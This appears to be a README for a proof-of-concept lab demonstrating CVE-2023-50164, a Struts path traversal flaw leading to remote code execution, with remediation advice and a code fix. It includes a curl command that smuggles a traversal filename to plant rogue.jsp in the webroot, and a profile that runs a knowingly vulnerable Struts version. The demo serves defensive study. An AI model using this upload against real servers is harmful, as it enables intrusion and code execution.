This is a Proof of Concept (PoC) for CVE-2023-50164, which outlines a new path traversal vulnerability which can lead to Remote Code Execution (RCE) in struts-core.
To remediate the issue, it is advised that you update to Struts 2.5.33 or Struts 6.3.0.2 or greater.
This repo builds off the excellent work of Henrik Plate found here.
There are two maven profiles in this project: vuln and no-vuln. vuln is the default.
To run with the RCE vuln, execute the following:
mvn clean jetty:run -P vuln
To run without the RCE vuln, execute the following:
mvn clean jetty:run -P no-vuln
The difference between the two profiles is vuln uses struts-core version 6.3.0.1
(which has the path traversal vulnerability) and no-vuln uses struts-core version 6.3.0.2
(which does not have the path traversal vulnerability)
while running the vuln profile described above, execute the following:
curl \
http://localhost:9999/struts-vuln-poc/upload.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"
You'll be able to see the file rogue.jsp in the src/main/webapp folder and you can browse to it at:
http://localhost:9999/struts-vuln-poc/rogue.jsp (you'll see a Ya been PWNED! message).
There is a code fix solution that works with the older Struts versions, but, it is still highly advised to update your version of Struts.
To exercise the code fix, execute the following:
curl \
http://localhost:9999/struts-vuln-poc/upload-no-vuln.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"
You'll see an error message: Attempted path traversal attack
NOTE: If you use the no-vuln profile, you won't get an error message from the /upload-no-vuln
endpoint, even if you use a relative path like: ../src/main/webapp/rogue.jsp, as the new version of struts
automatically strips away relative path references.